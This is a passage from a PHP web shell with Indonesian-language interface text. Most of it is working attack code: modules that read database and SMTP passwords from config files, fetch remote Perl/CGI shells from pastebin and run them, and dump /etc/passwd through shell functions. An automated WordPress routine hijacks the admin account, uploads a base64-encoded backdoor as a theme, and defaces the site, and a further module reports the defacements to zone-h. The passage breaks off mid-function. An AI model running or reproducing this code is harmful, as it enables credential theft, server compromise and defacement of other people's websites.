  1624. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1625. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1626. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1627. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1628. } elseif(preg_match("/client/", $ambil)) {
  1629. preg_match("/password=(.*)/", $ambil, $pass1);
  1630. if(preg_match('/"/', $pass1[1])) {
  1631. $pass1[1] = str_replace('"', "", $pass1[1]);
  1632. $pass .= $pass1[1]."\n";
  1633. }
  1634. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1635. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1636. }
  1637. }
  1638. echo $pass;
  1639. }
  1640. $cp_pass = cp_pass($dir);
  1641. echo $cp_pass;
  1642. echo "</textarea><br>
  1643. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1644. </form>
  1645. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1646. }
  1647. } elseif($_GET['do'] == 'smtp') {
  1648. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1649. function scj($dir) {
  1650. $dira = scandir($dir);
  1651. foreach($dira as $dirb) {
  1652. if(!is_file("$dir/$dirb")) continue;
  1653. $ambil = file_get_contents("$dir/$dirb");
  1654. $ambil = str_replace("$", "", $ambil);
  1655. if(preg_match("/JConfig|joomla/", $ambil)) {
  1656. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1657. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1658. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1659. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1660. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1661. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1662. echo "SMTP Host: <font color=#4B0082>$smtp_host</font><br>";
  1663. echo "SMTP port: <font color=#4B0082>$smtp_port</font><br>";
  1664. echo "SMTP user: <font color=#4B0082>$smtp_user</font><br>";
  1665. echo "SMTP pass: <font color=#4B0082>$smtp_pass</font><br>";
  1666. echo "SMTP auth: <font color=#4B0082>$smtp_auth</font><br>";
  1667. echo "SMTP secure: <font color=#4B0082>$smtp_secure</font><br><br>";
  1668. }
  1669. }
  1670. }
  1671. $smpt_hunter = scj($dir);
  1672. echo $smpt_hunter;
  1673. } elseif($_GET['do'] == 'auto_wp') {
  1674. if($_POST['hajar']) {
  1675. $title = htmlspecialchars($_POST['new_title']);
  1676. $pn_title = str_replace(" ", "-", $title);
  1677. if($_POST['cek_edit'] == "Y") {
  1678. $script = $_POST['edit_content'];
  1679. } else {
  1680. $script = $title;
  1681. }
  1682. $conf = $_POST['config_dir'];
  1683. $scan_conf = scandir($conf);
  1684. foreach($scan_conf as $file_conf) {
  1685. if(!is_file("$conf/$file_conf")) continue;
  1686. $config = file_get_contents("$conf/$file_conf");
  1687. if(preg_match("/WordPress/", $config)) {
  1688. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1689. $dbuser = ambilkata($config,"DB_USER', '","'");
  1690. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1691. $dbname = ambilkata($config,"DB_NAME', '","'");
  1692. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1693. $prefix = $dbprefix."posts";
  1694. $option = $dbprefix."options";
  1695. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1696. $db = mysql_select_db($dbname);
  1697. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1698. $result = mysql_fetch_array($q);
  1699. $id = $result[ID];
  1700. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1701. $result2 = mysql_fetch_array($q2);
  1702. $target = $result2[option_value];
  1703. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1704. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1705. echo "<div style='margin: 5px auto;'>";
  1706. if($target == '') {
  1707. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1708. } else {
  1709. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1710. }
  1711. if(!$update OR !$conn OR !$db) {
  1712. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1713. } else {
  1714. echo "<font color=#4B0082>sukses di ganti.</font><br>";
  1715. }
  1716. echo "</div>";
  1717. mysql_close($conn);
  1718. }
  1719. }
  1720. } else {
  1721. echo "<center>
  1722. <h1>Auto Edit Title+Content WordPress</h1>
  1723. <form method='post'>
  1724. DIR Config: <br>
  1725. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1726. Set Title: <br>
  1727. <input type='text' name='new_title' value='Hacked By Mr.Klimis' placeholder='New Title'><br><br>
  1728. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1729. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1730. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1731. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1732. </form>
  1733. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1734. ";
  1735. }
  1736. } elseif($_GET['do'] == 'zoneh') {
  1737. if($_POST['submit']) {
  1738. $domain = explode("\r\n", $_POST['url']);
  1739. $nick = $_POST['nick'];
  1740. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1741. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1742. function zoneh($url,$nick) {
  1743. $ch = curl_init("http://www.zone-h.com/notify/single");
  1744. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1745. curl_setopt($ch, CURLOPT_POST, true);
  1746. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1747. return curl_exec($ch);
  1748. curl_close($ch);
  1749. }
  1750. foreach($domain as $url) {
  1751. $zoneh = zoneh($url,$nick);
  1752. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1753. echo "$url -> <font color=#4B0082>OK</font><br>";
  1754. } else {
  1755. echo "$url -> <font color=red>ERROR</font><br>";
  1756. }
  1757. }
  1758. } else {
  1759. echo "<center><form method='post'>
  1760. <u>Defacer</u>: <br>
  1761. <input type='text' name='nick' size='50' value'Achon666ju5t'><br>
  1762. <u>Domains</u>: <br>
  1763. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1764. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1765. </form>";
  1766. }
  1767. echo "</center>";
  1768. }elseif($_GET['do'] == 'lcf') {
  1769. mkdir('LCF',0755);
  1770. chdir('LCF');
  1771. $kokdosya = ".htaccess";
  1772. $dosya_adi = "$kokdosya";
  1773. $dosya = fopen ($dosya_adi , 'w') or die ("Error mas broo!!!");
  1774. $metin = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .pl \n AddHandler cgi-script .pl \n AddHandler cgi-script .pl
  1775. \n \n Options \n DirectoryIndex seees.html \n RemoveHandler .php \n AddType application/octet-stream .php";
  1776. fwrite ( $dosya , $metin ) ;
  1777. fclose ($dosya);
  1778. $file = fopen("lcf.pl","w+");
  1779. $write = fwrite ($file ,file_get_contents("http://pastebin.com/raw/26jAL0sz"));
  1780. fclose($file);
  1781. chmod("lcf.pl",0755);
  1782. echo "<iframe src=LCF/lcf.pl width=97% height=100% frameborder=0></iframe>";
  1783. }
  1784. elseif($_GET['do'] == 'cgi') {
  1785. $cgi_dir = mkdir('idx_cgi', 0755);
  1786. $file_cgi = "idx_cgi/cgi.izo";
  1787. $isi_htcgi = "AddHandler cgi-script .izo";
  1788. $htcgi = fopen(".htaccess", "w");
  1789. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1790. $cgi = fopen($file_cgi, "w");
  1791. fwrite($cgi, $cgi_script);
  1792. fwrite($htcgi, $isi_htcgi);
  1793. chmod($file_cgi, 0755);
  1794. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1795. } elseif($_GET['do'] == 'fake_root') {
  1796. ob_start();
  1797. function reverse($url) {
  1798. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  1799. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1800. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  1801. curl_setopt($ch, CURLOPT_HEADER, 0);
  1802. curl_setopt($ch, CURLOPT_POST, 1);
  1803. $resp = curl_exec($ch);
  1804. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  1805. $array = explode(",,", $resp);
  1806. unset($array[0]);
  1807. foreach($array as $lnk) {
  1808. $lnk = "http://$lnk";
  1809. $lnk = str_replace(",", "", $lnk);
  1810. echo $lnk."\n";
  1811. ob_flush();
  1812. flush();
  1813. }
  1814. curl_close($ch);
  1815. }
  1816. function cek($url) {
  1817. $ch = curl_init($url);
  1818. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1819. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1820. $resp = curl_exec($ch);
  1821. return $resp;
  1822. }
  1823. $cwd = getcwd();
  1824. $ambil_user = explode("/", $cwd);
  1825. $user = $ambil_user[2];
  1826. if($_POST['reverse']) {
  1827. $site = explode("\r\n", $_POST['url']);
  1828. $file = $_POST['file'];
  1829. foreach($site as $url) {
  1830. $cek = cek("$url/~$user/$file");
  1831. if(preg_match("/hacked/i", $cek)) {
  1832. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=#4B0082>Fake Root!</font><br>";
  1833. }
  1834. }
  1835. } else {
  1836. echo "<center><form method='post'>
  1837. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1838. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1839. Domain: <br>
  1840. <textarea style='width: 450px; height: 250px;' name='url'>";
  1841. reverse($_SERVER['HTTP_HOST']);
  1842. echo "</textarea><br>
  1843. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1844. </form><br>
  1845. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1846. }
  1847. } elseif($_GET['do'] == 'adminer') {
  1848. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1849. function adminer($url, $isi) {
  1850. $fp = fopen($isi, "w");
  1851. $ch = curl_init();
  1852. curl_setopt($ch, CURLOPT_URL, $url);
  1853. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1854. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1855. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1856. curl_setopt($ch, CURLOPT_FILE, $fp);
  1857. return curl_exec($ch);
  1858. curl_close($ch);
  1859. fclose($fp);
  1860. ob_flush();
  1861. flush();
  1862. }
  1863. if(file_exists('adminer.php')) {
  1864. echo "<center><font color=#4B0082><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1865. } else {
  1866. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1867. echo "<center><font color=#4B0082><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1868. } else {
  1869. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1870. }
  1871. }
  1872. }elseif($_GET['do'] == 'passwbypass') {
  1873. echo '<center>Bypass etc/passw With:<br>
  1874. <table style="width:50%">
  1875. <tr>
  1876. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  1877. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  1878. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  1879. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  1880. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  1881. </tr></table>Bypass User With : <table style="width:50%">
  1882. <tr>
  1883. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  1884. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  1885. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  1886. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  1887. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  1888. </tr>
  1889. </table><br>';
  1890.  
  1891.  
  1892. if ($_POST['awkuser']) {
  1893. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1894. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  1895. echo "</textarea><br>";
  1896. }
  1897. if ($_POST['systuser']) {
  1898. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1899. echo system("ls /var/mail");
  1900. echo "</textarea><br>";
  1901. }
  1902. if ($_POST['passthuser']) {
  1903. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1904. echo passthru("ls /var/mail");
  1905. echo "</textarea><br>";
  1906. }
  1907. if ($_POST['exuser']) {
  1908. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1909. echo exec("ls /var/mail");
  1910. echo "</textarea><br>";
  1911. }
  1912. if ($_POST['shexuser']) {
  1913. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1914. echo shell_exec("ls /var/mail");
  1915. echo "</textarea><br>";
  1916. }
  1917. if($_POST['syst'])
  1918. {
  1919. echo"<textarea class='inputz' cols='65' rows='15'>";
  1920. echo system("cat /etc/passwd");
  1921. echo"</textarea><br><br><b></b><br>";
  1922. }
  1923. if($_POST['passth'])
  1924. {
  1925. echo"<textarea class='inputz' cols='65' rows='15'>";
  1926. echo passthru("cat /etc/passwd");
  1927. echo"</textarea><br><br><b></b><br>";
  1928. }
  1929. if($_POST['ex'])
  1930. {
  1931. echo"<textarea class='inputz' cols='65' rows='15'>";
  1932. echo exec("cat /etc/passwd");
  1933. echo"</textarea><br><br><b></b><br>";
  1934. }
  1935. if($_POST['shex'])
  1936. {
  1937. echo"<textarea class='inputz' cols='65' rows='15'>";
  1938. echo shell_exec("cat /etc/passwd");
  1939. echo"</textarea><br><br><b></b><br>";
  1940. }
  1941. echo '<center>';
  1942. if($_POST['melex'])
  1943. {
  1944. echo"<textarea class='inputz' cols='65' rows='15'>";
  1945. for($uid=0;$uid<60000;$uid++){
  1946. $ara = posix_getpwuid($uid);
  1947. if (!empty($ara)) {
  1948. while (list ($key, $val) = each($ara)){
  1949. print "$val:";
  1950. }
  1951. print "\n";
  1952. }
  1953. }
  1954. echo"</textarea><br><br>";
  1955. }
  1956. //
  1957.  
  1958. //
  1959. } elseif($_GET['do'] == 'auto_dwp') {
  1960. if($_POST['auto_deface_wp']) {
  1961. function anucurl($sites) {
  1962. $ch = curl_init($sites);
  1963. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1964. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1965. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1966. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1967. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1968. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1969. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1970. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1971. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1972. $data = curl_exec($ch);
  1973. curl_close($ch);
  1974. return $data;
  1975. }
  1976. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1977. $post = array(
  1978. "log" => "$userr",
  1979. "pwd" => "$pass",
  1980. "rememberme" => "forever",
  1981. "wp-submit" => "$wp_submit",
  1982. "redirect_to" => "$web",
  1983. "testcookie" => "1",
  1984. );
  1985. $ch = curl_init($cek);
  1986. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1987. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1988. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1989. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1990. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1991. curl_setopt($ch, CURLOPT_POST, 1);
  1992. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1993. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1994. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1995. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1996. $data = curl_exec($ch);
  1997. curl_close($ch);
  1998. return $data;
  1999. }
  2000. $scan = $_POST['link_config'];
  2001. $link_config = scandir($scan);
  2002. $script = htmlspecialchars($_POST['script']);
  2003. $user = "Mr.Klimis";
  2004. $pass = "Mr.Klimis";
  2005. $passx = md5($pass);
  2006. foreach($link_config as $dir_config) {
  2007. if(!is_file("$scan/$dir_config")) continue;
  2008. $config = file_get_contents("$scan/$dir_config");
  2009. if(preg_match("/WordPress/", $config)) {
  2010. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2011. $dbuser = ambilkata($config,"DB_USER', '","'");
  2012. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2013. $dbname = ambilkata($config,"DB_NAME', '","'");
  2014. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2015. $prefix = $dbprefix."users";
  2016. $option = $dbprefix."options";
  2017. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2018. $db = mysql_select_db($dbname);
  2019. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2020. $result = mysql_fetch_array($q);
  2021. $id = $result[ID];
  2022. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2023. $result2 = mysql_fetch_array($q2);
  2024. $target = $result2[option_value];
  2025. if($target == '') {
  2026. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2027. } else {
  2028. echo "[+] $target <br>";
  2029. }
  2030. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2031. if(!$conn OR !$db OR !$update) {
  2032. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2033. mysql_close($conn);
  2034. } else {
  2035. $site = "$target/wp-login.php";
  2036. $site2 = "$target/wp-admin/theme-install.php?upload";
  2037. $b1 = anucurl($site2);
  2038. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2039. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2040. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2041. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2042. $www = "m.php";
  2043. $fp5 = fopen($www,"w");
  2044. fputs($fp5,$upload3);
  2045. $post2 = array(
  2046. "_wpnonce" => "$anu2",
  2047. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2048. "themezip" => "@$www",
  2049. "install-theme-submit" => "Install Now",
  2050. );
  2051. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2052. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2053. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2054. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2055. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2056. curl_setopt($ch, CURLOPT_POST, 1);
  2057. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2058. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2059. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2060. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2061. $data3 = curl_exec($ch);
  2062. curl_close($ch);
  2063. $y = date("Y");
  2064. $m = date("m");
  2065. $namafile = "id.php";
  2066. $fpi = fopen($namafile,"w");
  2067. fputs($fpi,$script);
  2068. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2069. curl_setopt($ch6, CURLOPT_POST, true);
  2070. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2071. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2072. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2073. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2074. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2075. $postResult = curl_exec($ch6);
  2076. curl_close($ch6);
  2077. $as = "$target/k.php";
  2078. $bs = anucurl($as);
  2079. if(preg_match("#$script#is", $bs)) {
  2080. echo "[+] <font color='#4B0082'>berhasil mepes...</font><br>";
  2081. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2082. } else {
  2083. echo "[-] <font color='red'>gagal mepes...</font><br>";
  2084. echo "[!!] coba aja manual: <br>";
  2085. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2086. echo "[+] username: <font color=#4B0082>$user</font><br>";
  2087. echo "[+] password: <font color=#4B0082>$pass</font><br><br>";
  2088. }
  2089. mysql_close($conn);
  2090. }
  2091. }
  2092. }
  2093. } else {
  2094. echo "<center><h1>WordPress Auto Deface</h1>
  2095. <form method='post'>
  2096. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2097. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.Klimis' required><br>
  2098. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2099. </form>
  2100. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2101. </center>";
  2102. }
  2103. } elseif($_GET['do'] == 'auto_dwp2') {
  2104. if($_POST['auto_deface_wp']) {
  2105. function anucurl($sites) {
  2106. $ch = curl_init($sites);
  2107. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2108. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2109. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2110. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2111. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2112. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2113. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2114. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2115. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2116. $data = curl_exec($ch);
  2117. curl_close($ch);
  2118. return $data;
  2119. }
  2120. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2121. $post = array(
  2122. "log" => "$userr",
  2123. "pwd" => "$pass",
  2124. "rememberme" => "forever",
  2125. "wp-submit" => "$wp_submit",
  2126. "redirect_to" => "$web",
  2127. "testcookie" => "1",
  2128. );
  2129. $ch = curl_init($cek);
  2130. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2131. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2132. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2133. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2134. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2135. curl_setopt($ch, CURLOPT_POST, 1);
  2136. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2137. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2138. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2139. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2140. $data = curl_exec($ch);
  2141. curl_close($ch);
  2142. return $data;
  2143. }
  2144. $link = explode("\r\n", $_POST['link']);
  2145. $script = htmlspecialchars($_POST['script']);
  2146. $user = "Klimis";
  2147. $pass = "Klimis";
  2148. $passx = md5($pass);
  2149. foreach($link as $dir_config) {
  2150. $config = anucurl($dir_config);
  2151. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2152. $dbuser = ambilkata($config,"DB_USER', '","'");
  2153. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2154. $dbname = ambilkata($config,"DB_NAME', '","'");
  2155. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2156. $prefix = $dbprefix."users";
  2157. $option = $dbprefix."options";
  2158. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2159. $db = mysql_select_db($dbname);
  2160. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2161. $result = mysql_fetch_array($q);
  2162. $id = $result[ID];
  2163. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2164. $result2 = mysql_fetch_array($q2);
  2165. $target = $result2[option_value];
  2166. if($target == '') {
  2167. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2168. } else {
  2169. echo "[+] $target <br>";
  2170. }
  2171. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2172. if(!$conn OR !$db OR !$update) {
  2173. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2174. mysql_close($conn);
  2175. } else {
  2176. $site = "$target/wp-login.php";
  2177. $site2 = "$target/wp-admin/theme-install.php?upload";
  2178. $b1 = anucurl($site2);
  2179. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2180. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2181. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2182. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2183. $www = "m.php";
  2184. $fp5 = fopen($www,"w");
  2185. fputs($fp5,$upload3);
  2186. $post2 = array(
  2187. "_wpnonce" => "$anu2",
  2188. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2189. "themezip" => "@$www",
  2190. "install-theme-submit" => "Install Now",
  2191. );
  2192. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2193. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2194. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2195. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2196. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2197. curl_setopt($ch, CURLOPT_POST, 1);
  2198. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2199. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2200. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2201. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2202. $data3 = curl_exec($ch);
  2203. curl_close($ch);
  2204. $y = date("Y");
  2205. $m = date("m");
  2206. $namafile = "id.php";
  2207. $fpi = fopen($namafile,"w");
  2208. fputs($fpi,$script);
  2209. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2210. curl_setopt($ch6, CURLOPT_POST, true);
